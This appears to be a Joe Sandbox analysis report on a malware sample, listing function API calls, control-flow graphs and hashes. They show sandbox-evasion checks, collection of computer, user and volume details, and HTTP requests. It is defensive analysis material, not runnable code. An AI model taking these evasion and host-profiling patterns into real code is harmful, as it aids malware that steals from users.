                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                            • API String ID: 3630751533-2791005934
                                                            • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                            • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                            • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                            • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                                            Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1090 417500-41754a GetWindowsDirectoryA 1091 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1090->1091 1092 41754c 1090->1092 1099 4175d8-4175df 1091->1099 1092->1091 1100 4175e1-4175fa call 418d00 1099->1100 1101 4175fc-417617 GetProcessHeap HeapAlloc 1099->1101 1100->1099 1103 417619-417626 call 41a740 1101->1103 1104 417628-417658 wsprintfA call 41a740 1101->1104 1111 41767e-41768e 1103->1111 1104->1111
                                                            APIs
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                            • wsprintfA.USER32 ref: 00417640
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                            • String ID: :$C$\
                                                            • API String ID: 3790021787-3809124531
                                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                                            Function 022D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1112 22d003c-22d0047 1113 22d004c-22d0263 call 22d0a3f call 22d0e0f call 22d0d90 VirtualAlloc 1112->1113 1114 22d0049 1112->1114 1129 22d028b-22d0292 1113->1129 1130 22d0265-22d0289 call 22d0a69 1113->1130 1114->1113 1132 22d02a1-22d02b0 1129->1132 1134 22d02ce-22d03c2 VirtualProtect call 22d0cce call 22d0ce7 1130->1134 1132->1134 1135 22d02b2-22d02cc 1132->1135 1141 22d03d1-22d03e0 1134->1141 1135->1132 1142 22d0439-22d04b8 VirtualFree 1141->1142 1143 22d03e2-22d0437 call 22d0ce7 1141->1143 1144 22d04be-22d04cd 1142->1144 1145 22d05f4-22d05fe 1142->1145 1143->1141 1148 22d04d3-22d04dd 1144->1148 1149 22d077f-22d0789 1145->1149 1150 22d0604-22d060d 1145->1150 1148->1145 1154 22d04e3-22d0505 LoadLibraryA 1148->1154 1152 22d078b-22d07a3 1149->1152 1153 22d07a6-22d07b0 1149->1153 1150->1149 1155 22d0613-22d0637 1150->1155 1152->1153 1156 22d086e-22d08be LoadLibraryA 1153->1156 1157 22d07b6-22d07cb 1153->1157 1158 22d0517-22d0520 1154->1158 1159 22d0507-22d0515 1154->1159 1160 22d063e-22d0648 1155->1160 1164 22d08c7-22d08f9 1156->1164 1161 22d07d2-22d07d5 1157->1161 1162 22d0526-22d0547 1158->1162 1159->1162 1160->1149 1163 22d064e-22d065a 1160->1163 1165 22d0824-22d0833 1161->1165 1166 22d07d7-22d07e0 1161->1166 1167 22d054d-22d0550 1162->1167 1163->1149 1168 22d0660-22d066a 1163->1168 1169 22d08fb-22d0901 1164->1169 1170 22d0902-22d091d 1164->1170 1176 22d0839-22d083c 1165->1176 1171 22d07e4-22d0822 1166->1171 1172 22d07e2 1166->1172 1173 22d0556-22d056b 1167->1173 1174 22d05e0-22d05ef 1167->1174 1175 22d067a-22d0689 1168->1175 1169->1170 1171->1161 1172->1165 1177 22d056d 1173->1177 1178 22d056f-22d057a 1173->1178 1174->1148 1179 22d068f-22d06b2 1175->1179 1180 22d0750-22d077a 1175->1180 1176->1156 1181 22d083e-22d0847 1176->1181 1177->1174 1183 22d057c-22d0599 1178->1183 1184 22d059b-22d05bb 1178->1184 1185 22d06ef-22d06fc 1179->1185 1186 22d06b4-22d06ed 1179->1186 1180->1160 1187 22d0849 1181->1187 1188 22d084b-22d086c 1181->1188 1195 22d05bd-22d05db 1183->1195 1184->1195 1189 22d06fe-22d0748 1185->1189 1190 22d074b 1185->1190 1186->1185 1187->1156 1188->1176 1189->1190 1190->1175 1195->1167
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022D024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: 843d15250191d38fba398d3ca70026578c5ac18b496f9cfb788fbf15331d557a
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 9D525C74A11229DFDB64CF98C984BACBBB1BF09314F1480D9E54DAB365DB30AA85CF14
                                                            Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874500), ref: 004198A1
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744E8), ref: 004198BA
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874488), ref: 004198D2
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874530), ref: 004198EA
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874518), ref: 00419903
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874850), ref: 0041991B
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00842E90), ref: 00419933
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00842CF0), ref: 0041994C
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00874548), ref: 00419964
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744A0), ref: 0041997C
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744B8), ref: 00419995
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008744D0), ref: 004199AD
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00842C30), ref: 004199C5
                                                              • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008741B8), ref: 004199DE
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                              • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                            • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                                            • CloseHandle.KERNEL32(?,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                            • ExitProcess.KERNEL32 ref: 00416B22
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 3511611419-0
                                                            • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                            • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                            • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                            • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                                            Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??2@$CrackInternetlstrlen
                                                            • String ID: <
                                                            • API String ID: 1683549937-4251816714
                                                            • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                            • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                            • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                            • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                                            Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1261 401220-401247 call 4189b0 GlobalMemoryStatusEx 1264 401273-40127a 1261->1264 1265 401249-401271 call 41da00 * 2 1261->1265 1267 401281-401285 1264->1267 1265->1267 1269 401287 1267->1269 1270 40129a-40129d 1267->1270 1272 401292-401294 ExitProcess 1269->1272 1273 401289-401290 1269->1273 1273->1270 1273->1272
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                            • __aulldiv.LIBCMT ref: 00401258
                                                            • __aulldiv.LIBCMT ref: 00401266
                                                            • ExitProcess.KERNEL32 ref: 00401294
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                            • String ID: @
                                                            • API String ID: 3404098578-2766056989
                                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                                            Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1275 416af3 1276 416b0a 1275->1276 1278 416aba-416ad7 call 41aad0 OpenEventA 1276->1278 1279 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1276->1279 1284 416af5-416b04 CloseHandle Sleep 1278->1284 1285 416ad9-416af1 call 41aad0 CreateEventA 1278->1285 1284->1276 1285->1279
                                                            APIs
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                                            • CloseHandle.KERNEL32(?,00000000,?,00876340,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                            • ExitProcess.KERNEL32 ref: 00416B22
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                            • String ID:
                                                            • API String ID: 941982115-0
                                                            • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                            • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                            • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                            • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                            Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406303
                                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0087A830,00000000,00000000,00400100,00000000), ref: 00406385
                                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                            • String ID: ERROR$ERROR
                                                            • API String ID: 3287882509-2579291623
                                                            • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                            • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                            • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                            • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                            Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocComputerNameProcess
                                                            • String ID:
                                                            • API String ID: 4203777966-0
                                                            • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                            • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                            • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                            • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                            Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                            • ExitProcess.KERNEL32 ref: 00401143
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                                            • String ID:
                                                            • API String ID: 1103761159-0
                                                            • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                            • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                            • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                            • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                            Function 0084A21E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084A246
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0084A266
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_849000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 1c7311426dc1da6e75dcf2384b436366e3098b8b30e8c91ddc6371c7137325a9
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 0FF0F6361407297BD7203BF9988CB6FB2ECFF49724F100629E642D54C0CBB2EC455A62
                                                            Function 022D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000400,?,?,022D0223,?,?), ref: 022D0E19
                                                            • SetErrorMode.KERNEL32(00000000,?,?,022D0223,?,?), ref: 022D0E1E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 50aa6c00ba5b177b5bbeec93bfda0059b8d1f6a57755c1eca6658fe1f3340d39
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: FED0123115512877D7002AE4DC09BCD7B1CDF09B66F008011FB0DD9080C770964046E5
                                                            Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
